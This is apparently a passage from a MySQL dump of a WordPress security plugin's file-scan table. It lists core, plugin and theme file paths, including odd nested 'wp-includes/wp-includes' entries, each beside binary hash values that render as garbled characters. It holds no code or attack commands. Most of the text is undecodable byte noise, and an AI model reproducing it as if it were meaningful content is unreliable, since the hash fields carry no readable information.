�����:{��W��e','6{w���^Gk�Ϋ�25�b��\r��񓫄�','',0,'?'),('�U�\\L�3�.lV�?t�','wp-content/plugins/wordpress-seo/src/helpers/home-url-helper.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�W�ĄF�z�֍�','hTWNB��ZG��򮀔��v�R�f�y\Z�e�A','',0,'?'),('�z�h9��ꈦ��Xp�+','wp-content/plugins/wordfence/views/scanner/no-issues.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','xt-|�F������e�','��_?7���c���:_��@���E�J��s��[','',0,'?'),('����v���V5ǃ�D�u','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/Asn.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ڄ�\n�1�h;!�','�Mϡ�	����p�k��)����!\r��','',0,'?'),('��ҕտ���Jb8���.','wp-content/plugins/wordpress-seo/src/config/migrations/20200617122511_CreateSEOLinksTable.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m���u��ɂ���','5ֱ\Z*�!#����~�$��}&\\�O���FQ�m','',0,'?'),('��E�S�c+��#�)','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Poly1305.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','u�Nm�S���C��{�','���P~�{p��}x{�8�2�hX�x���','',0,'?'),('�ˋ�A�F�wD4B\0�','wp-includes/rest-api/endpoints/class-wp-rest-url-details-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��#Cr�O��]����','s�Z�Y��W��Se��ҽM�`��]��^q�����','',0,'?'),('��|T�q�/��F�~','wp-content/plugins/wp-smushit/app/class-abstract-page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����H*���E|�','J�0Q�����J�ﰙ3L;c��p�\\q7o�LU�','',0,'?'),('��F�����{��A','wp-content/plugins/wordfence/lib/sysinfo.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�{X�6��92����','G,��=����C\Z3���~f�(8��Ψ��@�,ї','',0,'?'),('����~�a�De��F�G','wp-content/plugins/wordpress-seo/admin/metabox/class-abstract-sectioned-metabox-tab.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#���J}<K��8\0����','��f�q�9҅��gfy)Ѐ_a�\"\"]��(Ʉl','',0,'?'),('��E���Q?��	(�','wp-includes/class-oembed.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y���ҿ~�K�H�<�f','? �An�6����&z\'`�,��j�]m����v','',0,'?'),('���&^��Zr\']�+�','wp-content/plugins/wp-smushit/app/assets/images/firefox-logo@2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Љ\r;g�S��\0�)\r�','B��ӝ��	�L�����|}�V8��4�)5�u�$','',0,'?'),('�H�(o�Aؾ��鴰','wp-content/plugins/wordpress-seo/src/deprecated/src/conditionals/farsi-support-conditional.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��/�y\'��.�<-','�g�װ�`�>�K6�[��k��c��ƨ','',0,'?'),('�.݁B��xK�Y�','wp-includes/ms-default-filters.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���kHj�霶�?��','hU�`K�m�)�n�SL�QI�`�]���d�HF','',0,'?'),('�\n`Z�Q*�N�v�~','wp-includes/wp-includes/sodium_compat/composer.json',0,'`��NKp@}���\r�|','`��NKp@}���\r�|','���a���<K�-��Ìb=7t�#�-8��/��`','',0,'?'),('�.����F��g%�>','wp-content/plugins/wordpress-seo/js/dist/reindex-links.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�mO�K�-­q�g���','\"g8?�`g���6ap�3+#4)S�\r;�5e�','',0,'?'),('��z_	t\\a�����rg','wp-includes/blocks/comments-pagination-numbers/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Q�S!��)�x��p/','F<�j2�1]W�<p��7��g�-�����ȋ','',0,'?'),('��6����~e�{�\".w','wp-includes/widgets/class-wp-widget-recent-comments.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<��F��`�����','����ԃ�O�h�	��8q��p����=F[r','',0,'?'),('�*O-�Lτ���\r[�u','wp-admin/css/about-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g�5@���Y\Z6iO','�w.\\:��J������{=ԃ�zܚ��,���Tx','',0,'?'),('�??n�����_2g��j','wp-includes/js/wp-util.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ѱ~�����t\r�(1M�','�@\"L;j����ߖ�;2Lg��r\n�Z2���C�?','',0,'?'),('�P_ւz���X�j�}D','wp-includes/wp-includes/class-wp-taxonomy.php',0,'Kx�om���u�5t�','Kx�om���u�5t�','��8TI�|�|C�!��`vg�#�Q!ɓ{=��','',0,'?'),('�Yg�$z�H�.Y��','wp-content/plugins/wordfence/modules/login-security/views/settings/user-stats.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��(��`W�6�$�','fDYr��tt��}}}1�q/u|�����;�B','',0,'?'),('�Y�g��)�ʪ�!�t��','wp-content/plugins/wp-smushit/app/assets/css/smush-rd.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���&Ḱ��Ӧ��S','��k����R���Q�E$�E;��~���\r8Um|S','',0,'?'),('�\\����\\�hO����','wp-includes/wp-includes/class-wp-http-ixr-client.php',0,'�����2���5K','�����2���5K','�BVrAC\n�a�+���(�;%�FdC��TD�#��','',0,'?'),('�_!�N6#\"�=uq�}','wp-content/plugins/wordpress-seo/js/dist/select2/i18n/bs.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e��M{�K�\ZhfQ&u��','4��o\Z��N);�DW2���f��&�zZ�]','',0,'?'),('�f�踜΀��\n','wp-includes/wp-includes/post-thumbnail-template.php',0,'���d��V��cꘄ','���d��V��cꘄ','G�%*�J	���$��o=�@��k����Jl�','',0,'?'),('�p�8W4�k�c>�8','wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/promises/src/AggregateException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ݾ��2iI�\'��z�m','�h��qUtx�(�m8K퇗�\'�2haq�[�s','',0,'?'),('�r���OG���z�','wp-content/themes/hitmag/inc/kirki/assets/images/kirki-bottom.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����v�}��^��','�%\Z�\"S��/k��������������Q�','',0,'?'),('���-�sE�\"EH�-�*�','wp-content/plugins/wp-cerber/assets/flags/pg.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','D1l��㉌�h4\r��','�����33�/bV8{Z�wx=����:��5�#','',0,'?'),('���D�N�Gcf�8u�','wp-content/plugins/wordpress-seo/src/services/health-check/page-comments-check.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e�P������Y���p','�$V����Μ��I�/d�oe���j�%̓Ģ','',0,'?'),('��r9y��/���Z]�','wp-includes/wp-includes/js/mediaelement/mediaelement-and-player.min.js',0,'m�iz+*;)��E�','m�iz+*;)��E�','�-5(��:�oQ[̪���\\�\nm~�CP','',0,'?'),('��A,�\'�l�2ޏd~','wp-content/plugins/wp-cerber/assets/flags/gn.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\0q�սz=���W� 6','ؖ�u�j�.^��0j�d�8R�İ���o9','',0,'?'),('���;�dAo+��d(�','wp-includes/blocks/quote/theme-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�:s�VR��p�Ծ� 4>','��.�g��}$b�XQ�\"j��J}�Gjc�ݺ��','',0,'?'),('����m��ӟa����','wp-includes/blocks/post-featured-image/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%Z]5q��[�^I�','>1�9{$?9�N�@\0I\n�)�xCx�g�WL -a,�','',0,'?'),('�Ϋ����q9�Z~؀Bq','wp-includes/wp-includes/customize/class-wp-customize-nav-menu-locations-control.php',0,'�D��]σ��2+fX','�D��]σ��2+fX','Ѵg�h��m�s�ꄑ��-vmQ�Ij�\Z]sQT9�m','',0,'?'),('��E��e���Ar�и','wp-content/plugins/wordpress-seo/src/conditionals/yoast-admin-and-dashboard-conditional.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-��n7ޗ��n','��D[�� 2�j7��\n\n�s����TI��x�','',0,'?'),('��\n��R�b��x���g','wp-includes/css/dist/block-library/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��J�L	��G�D$йy�','\\c�RAn�H��4S��t蕥�<�<� �[�','',0,'?'),('��Y�\0)\r/j�)�Ar','wp-includes/customize/class-wp-customize-filter-setting.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M��`f��\0�iu�','�\0<\n�j:��Y�F���d�w��	���','',0,'?'),('���<��}d�����','wp-content/plugins/wp-cerber/assets/flags/ck.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','޶�4�}�~�x����o','t̯A��!��*��CՒ?��+qG��=XBR�','',0,'?'),('�c��Y	JB�H���','wp-content/plugins/wordpress-seo/vendor_prefixed/psr/log/Psr/Log/LoggerAwareInterface.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(Bߛ�H�	�}0�','�������w���0����l�����?��','',0,'?'),('�؉�iIqt#]4','wp-content/plugins/wordpress-seo/admin/capabilities/class-capability-manager-integration.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','A�<���3������','����3��Mx����#�0�63�#�a�u2�','',0,'?'),('�SD�=�nK�ظ�','wp-includes/wp-includes/version.php',0,'��|�\ZelǢc�$�\Z','��|�\ZelǢc�$�\Z','H70wN1��_\n�T?a��(-l�]�g��9','',0,'?'),('�+D���1�S�E�MEZ','wp-content/themes/hitmag/inc/kirki/modules/icons/class-kirki-modules-icons.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#݋�_��F)z��-��','Y�(p�Hx��X����Ut�ZO�~��)�1','',0,'?'),('�P�h`|/���:W�\0','wp-includes/blocks/columns/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ĺ��h�l��E=G','c�33T� �w�--�0���~�Q�����<5^','',0,'?'),('�$n1��U\\�x(�','wp-includes/blocks/missing/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���YsA)��7��Ɣ�','�Ic�r1�P�D|��ǡ�\r�Q��2��~','',0,'?'),('�!���\"�-;4-?','wp-content/plugins/redirection/locale/json/redirection-lv.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ʚ����Z��8ZPO�','�P����	\"�{��\\TD\Zx��*�D�p�','',0,'?'),('�$_���X��la�','wp-includes/js/jquery/ui/sortable.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','l�%�~ւ\'ᒒ$�`p','| c����!�ykס,_���n�}��4�T','',0,'?'),('�1�[�qs���o-O#�','wp-content/plugins/wordpress-seo/src/config/migrations/20200507054848_DeleteDuplicateIndexables.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ic�\n���`NEBd�','U���\nu�UK��}\r�.�����[w\' SYΕ*','',0,'?'),('�?	��W$j�P+)���','wp-content/plugins/all-in-one-wp-security-and-firewall/languages/all-in-one-wp-security-and-firewall-pl_PL.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��CSȋ�I�','	D�\Z\0�^�[t�a�q���HҼ�}����?','',0,'?'),('�E���F��Q�-5�','wp-content/plugins/redirection/locale/redirection-ja.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���T���P��DJ�','ơ!pM���oپپ�@������ɱ�;6��̼','',0,'?'),('�R;lzO�8m<3�Nie','wp-admin/user/freedoms.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`���U�� }��\n�','�οzB�+q���5Vl�K�l��k���Z/��|','',0,'?'),('�Sa�(m˫Qy���u�','wp-content/themes/hitmag/inc/kirki/controls/php/class-kirki-control-typography.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�/eg	BŢ�)�L','����� �m\"#��.\Z1$A�h�	\'dM�','',0,'?'),('�afh=F���T�:��6�','wp-admin/includes/class-ftp-sockets.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Zc78\r��j��j�ؒ','��Q�,�0\rNQJ����Y�����m�ʼ0��A�','',0,'?'),('�ik[!gW��}�v�ȵ','wp-includes/blocks/image/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','L�~��T�%�S@0�	','����Y%�!�sl>�[z���q93`4�ԗ\'�','',0,'?'),('�y�B2\"D�V	c�','wp-content/themes/hitmag/inc/kirki/modules/custom-sections/sections/class-kirki-sections-default-section.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ˍ�\r���[\nނ)�','�B;m�CI�;l�e��c������y�j�\n','',0,'?'),('�{(諸���S:�<X>','wp-includes/wp-includes/rest-api/search/class-wp-rest-search-handler.php',0,',��x&����{\n�x�\\',',��x&����{\n�x�\\','�sޢ���zj�λ�\'Ҳ���wE�?��','',0,'?'),('��;��ܷ�I�(�2','wp-content/plugins/wp-fastest-cache/templates/cloudflare_warning.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�!l��ϏE��3SW-FM','�	Z���[�\'l�4Ň�nU��4T0�T�0','',0,'?'),('�����;~ӷR�>��','wp-includes/class.wp-scripts.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7 ��#K���h�+','r�uڶbW8��7f����G]�k\0���f5��','',0,'?'),('���nvp�e������}�','wp-admin/js/customize-controls.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-�b*A��@�-C��}','1�Z:g���]oLK2�V.�UF���;��*�k�u','',0,'?'),('���	�JB1�����','wp-includes/wp-includes/js/dist/annotations.js',0,'��T[qx/�^�`P����','��T[qx/�^�`P����','��7��[PS�%�\r����)/Qe�X�|ۺ4�','',0,'?'),('��&���#\Z�y��','wp-content/plugins/wordpress-seo/src/integrations/cleanup-integration.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�� ��n����{',')�4$�?��+��[�ae����7B]4&|h�	','',0,'?'),('���D�Tǡ�#\"�1?�','wp-includes/blocks/cover/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����Zv�\r�O�.','��0�:�MR�} ��F��l�D�^�U��i','',0,'?'),('��P���Z2�7�Mn��','wp-includes/blocks/rss/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{]ө��Z>�ﭒ��','d�Z�3��a�Hّ�2�\'t���\0L�\\[��i!Q','',0,'?'),('��ucZ��o��s�','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-list-comment-spammer-ip.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����Ѓ:��X@4�','���\r#�O:��H�Kn����$�������h�','',0,'?'),('�¿d��gyQm���F','wp-content/plugins/wp-fastest-cache/languages/wp-fastest-cache-it_IT.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�>���p��{/����','W�����_��/x����J��c���Vҝ�n��px','',0,'?'),('�āE�<OM=��d��','wp-content/plugins/wp-smushit/languages/wp-smushit.pot',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���.ï�Ƭ3�M��','��]\Za��6�[��z߯K�ν���Z)W�','',0,'?'),('���*��h^������','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/lib/php72compat_const.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\n<Tfw��Y�_I���','e��\'#�\\�?����O-�U�L�]5�6��$','',0,'?'),('�� �\\���…�Tn��]','wp-includes/Requests/IDNAEncoder.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�y�G���}n(�Y��','/��<�E��=C��$�x��BHx��J�`Jw','',0,'?'),('��W�h�DsN� �I5','wp-includes/wp-includes/js/dist/vendor/wp-polyfill-fetch.min.js',0,'���蛻�0�ե�J9�','���蛻�0�ե�J9�','�V�j݈��o��ȟ{\'7�Úع�����','',0,'?'),('���B\\u}�L�,���','wp-includes/css/dist/block-directory/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!�o��E��V<���%','t�kaӽH���\0\0I$�t�������6Ho�','',0,'?'),('��\Z���3�H�{�Dz�','wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/Exception/InvalidInputException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r� ���Ϭ�n+�n','^�q�N����Т��&yN�~�\'S//>}�p','',0,'?'),('�\"�Q�OO��P���b','wp-includes/blocks/group/theme.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*&Z��e�d8�oͦ','�j1���+?PȕY聿Q��<\r���\\T��','',0,'?'),('�#:���Sk�U���{�','wp-content/plugins/wordfence/modules/login-security/classes/model/view.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*�:�?��l]�����u','2P��탚��=w=��7Ar�\n�fQ��~,��B','',0,'?'),('�(�|n��sARF�+','wp-includes/js/crop/marqueeHoriz.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�̮����;���Lo\n','|���S�e��|.���/�Q�Y��W�}(','',0,'?'),('�0�,���M���_)','wp-includes/blocks/comment-content/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�tfg}�ȅ��A��P','�����2��Ш!H`a��]Uq��\Z[}','',0,'?'),('�@�<�� ����M�','wp-includes/wp-includes/js/customize-loader.js',0,'�`�6��!��҃z��','�`�6��!��҃z��','�G?~�D�,(�F]�I�bNE��pc�v:���z','',0,'?'),('�[\'�/���;���','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Poly1305/State.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��yP58��Ƣ����','��z3qS���T=�䞌HL<Y5A��#H','',0,'?'),('�c:Qk2�	 �6��','wp-includes/blocks/columns/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=2��X�t�}^侹�_','w>��j�Bi}���#p�S���$��g~J`�v','',0,'?'),('�h��$��{h8�\n!D','wp-content/plugins/wp-smushit/app/views/settings-row.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','aC�[��	z��8-����','��Qk���V��;�H���3���6界��&��mL','',0,'?'),('�u�{�P9Q�)�E','wp-content/plugins/wp-smushit/core/modules/class-abstract-module.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Tb,çc���U�8��(','���P�&\\:��5\'Ѱ�P<���}BEb&�','',0,'?'),('��>��$\'��i�','wp-content/plugins/redirection/locale/redirection-en_NZ.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\Ԫ`�>�W�l��B\0�',';�k\"���\"WXy���V0	RN�;�a0�w���x�','',0,'?'),('�����:[&b�[�hY��','wp-includes/images/smilies/icon_razz.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9[�w���D�AM�A�',';���P�1]f�UE��;`Qڮ�\ne�Z\0@4�aA�','',0,'?'),('����T�2P>�\"x�','wp-content/plugins/wp-smushit/app/assets/images/onboarding/graphic-onboarding@2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','R�m\\���|t�br��`','��57\'�g*�]�w?U�:�\n�\\�c� �tx���','',0,'?'),('���x�vOR�cb�x�','wp-includes/wp-includes/images/crystal/code.png',0,'`�1�����1�9','`�1�����1�9',';�67����\r�!����x\Z_@H��&C��-��','',0,'?'),('�� 2�a�!�O�I','wp-content/plugins/wp-smushit/app/assets/images/incsub-logo@2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n�O�CRw`T\r�8<','�[pƙ����^_�9h���hCJ�x�j���s�','',0,'?'),('������T�^�䘪�','wp-includes/wp-includes/js/jquery/ui/draggable.min.js',0,'�J���\\O��Љ/�Hp%','�J���\\O��Љ/�Hp%','�N��B\0�!8\r���o? �)E�C>��','',0,'?'),('���x2�_.�~$�)','wp-includes/js/dist/core-data.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���Y�é{��q�','{�7��z���F���=�=4�PqC����f�Q','',0,'?'),('��8Q����f���','wp-content/plugins/wordpress-seo/src/deprecated/frontend/schema/class-schema-website.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','C�#�B8�K��','8~��#��\r���hlӲ���\r��/�>]t��u','',0,'?'),('�LJ��U$$7: �ߖ.\r','wp-content/themes/hitmag/inc/kirki/modules/field-dependencies/field-dependencies.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#)/2��iD�/����+','1�����MJ�����]x~ٸ3W^�G��4y��','',0,'?'),('�ه�Wz���0���L`','wp-includes/wp-includes/rest-api/search/class-wp-rest-term-search-handler.php',0,'��cW�U��ԟ�`B	','��cW�U��ԟ�`B	','w�\r��j�*�m�l]� �t��PU�\r�E��','',0,'?'),('��8z��?�.�C�q]�','wp-content/plugins/wp-fastest-cache/images/othercdn.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����?j�t�}r]','dX�d�\0�G\n,�؛D��Y\Z�\'��ؖ�&;\0�Tz','',0,'?'),('��$�tզ}�	�T','wp-includes/blocks/code/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h����h�w>���C��','#�0�c����k�S��vܾl���n�lJ�7��','',0,'?'),('�Ὀ����5f?�hk','wp-includes/widgets/class-wp-widget-media-audio.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g�3[h��3��s�\"Pk','t��{Ď\n��\'K�2rX��2��\'����,A�18','',0,'?'),('���5zj���n��x�@','wp-includes/wp-includes/js/jquery/ui/progressbar.min.js',0,'\Z�sk�����Z�j	Y','\Z�sk�����Z�j	Y','���7���v��\r6��1��N9@v�7�$�a��','',0,'?'),('���y/�sR��O��','wp-content/plugins/wp-cerber/assets/flags/bm.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�p�+z�6ko6��qwh','?-mt��FB��G�\n�o�[��%��X;�N�','',0,'?'),('��k5NK�Esu�5]�','wp-includes/wp-includes/css/wp-auth-check.min.css',0,'�j��b�u��=�`c','�j��b�u��=�`c','�\r[�B�{\'C�N5zZw� pȈ��I�K�e ��','',0,'?'),('����8`9��?Bb�Б','wp-includes/js/jquery/ui/effect-puff.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�TF�\n�b�Տ����','?��K�1��P�zr[��a0���ͷL��O�','',0,'?'),('���4��vT�?O��','wp-includes/wp-includes/class-wp-date-query.php',0,'3�U��	�L]-�Rs�@�','3�U��	�L]-�Rs�@�','ֲP4]���!	o3\n��l���Q�0�','',0,'?'),('�\n��� ��/Y','wp-includes/js/dist/data-controls.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�l�DT1�]�!��w3�','m�>��b���N�D\\�8b!���\0ET�/+#��','',0,'?'),('���}�V��I���','wp-includes/blocks/cover.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ԑ�u��Nl�\'� X��','�8\r?�b��sOPNVla&LJE��_ޢ(J\\�j','',0,'?'),('�4��+��&S�`J','wp-includes/wp-includes/feed.php',0,'�z2�j��(=iSM�IV�','�z2�j��(=iSM�IV�','\Z�/������\'\\��.��	7�����3','',0,'?'),('� Z��Z:�2g4�P�','wp-content/themes/hitmag/inc/kirki/modules/preset/class-kirki-modules-preset.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'���������-h�','��8z�K\Z��1�Rv�nY�e��GA\0�-n�','',0,'?'),('�+F�4�\n��q���\"]','wp-includes/blocks/table/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�2h)���r6�C���','���8�t�ڎ9>�V�\\�sDe���g#�����','',0,'?'),('�2�v�\'����{�1\0��','wp-content/plugins/wordpress-seo/src/integrations/admin/background-indexing-integration.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����yݽ�I�Rӄ��','����t��7�eeov\r݇ڇ���:����\\z','',0,'?'),('�PD�$ڊpE���lv�','wp-content/plugins/wordpress-seo/vendor_prefixed/chillerlan/php-qrcode/src/Data/Number.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','A�9-L�?U\'�W�D,�','\\�ol�?E�lBꥌ�i�L�h��k�_ۘ�^�C','',0,'?'),('�a��.�j@��^��','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/psalm-above-3.xml',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|<Qq��)@�M��J��','/�jo�z�y����@��z%9�&F%��[','',0,'?'),('�c�̎��$\n\'@�\r��','wp-admin/setup-config.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��	��,!簪�x�g','�q����0��	�v��S��^��B?s@','',0,'?'),('�g�h�B�g��lI�~','wp-includes/wp-includes/js/dist/vendor/react-dom.js',0,'C��InV��9����','C��InV��9����','LrJ�#��6h����\r�ȴD�R5��b:uM','',0,'?'),('�k�3�������j8�y','wp-content/plugins/wordpress-seo/src/helpers/permalink-helper.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��bK� �=f��{�Д','`��Իi	��c\'�ԭ��5�R���KMOe','',0,'?'),('�m֙7�,�}��ov','wp-includes/css/dist/block-library/theme-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','i��{.��څղ1N','*R݌��l�#������4մ�d���o��_���','',0,'?'),('�w4��>���z�G�/','wp-content/plugins/wordpress-seo/src/services/health-check/curl-runner.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y���k�W*F��[S\Z��','�����i���WN�`���]�d�z\\','',0,'?'),('���_wY�6�;�W;D#','wp-content/plugins/wp-smushit/app/assets/js/smush-tutorials.min.js.map',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','U��K�W��{��=�','<Z�JpW�2X\0���1Yw�0Xr�\'�{?��z4�','',0,'?'),('��0Z�����G\'&j�','wp-content/plugins/wordpress-seo/src/services/importing/importable-detector-service.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���,r��k�9@gٍ�','�s���\"�jl?Q�6��w����\rON��','',0,'?'),('���V��t�S�-��','wp-content/plugins/wordfence/views/scanner/issue-file.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','KW?~���\rc��H','i�%>�\\6�L���{8������y�Z��AH�','',0,'?'),('��;AD]AA٫IfI�\Z','wp-content/plugins/wp-fastest-cache/languages/wp-fastest-cache-sv_SE.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','w�aA�fܹb^��;�','��W�T�-���5_E�^\r}Ր���%(�~','',0,'?'),('���J1��M�F��<�','wp-admin/js/tags-box.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����a\0�!�u�U','���C����ZA��3��mZ�x��D�','',0,'?'),('�����Ƅ���NB׭','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/autoload-pedantic.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�@8���s��A��','b�#�x��h�F4�_ �De���qeD��','',0,'?'),('���^>���6z�@p�','wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-taxonomies-controller.php',0,'�C_�n�4]hc��3�?','�C_�n�4]hc��3�?','�wD�Z��s�J������dӚ�K���N҇','',0,'?'),('��c�-,R�qee\\�','wp-includes/blocks/group/theme-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\	�ʝ�=�fZ9U','�\ri�$y+�h�?����j魾\Z���b3�sJ)','',0,'?'),('�̵���C(�;��j��','wp-content/plugins/wordpress-seo/src/deprecated/admin/taxonomy/class-taxonomy-social-fields.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��[��{: 3;�\06�\'�','��T�F���_r�oM�b(�\r:�@ 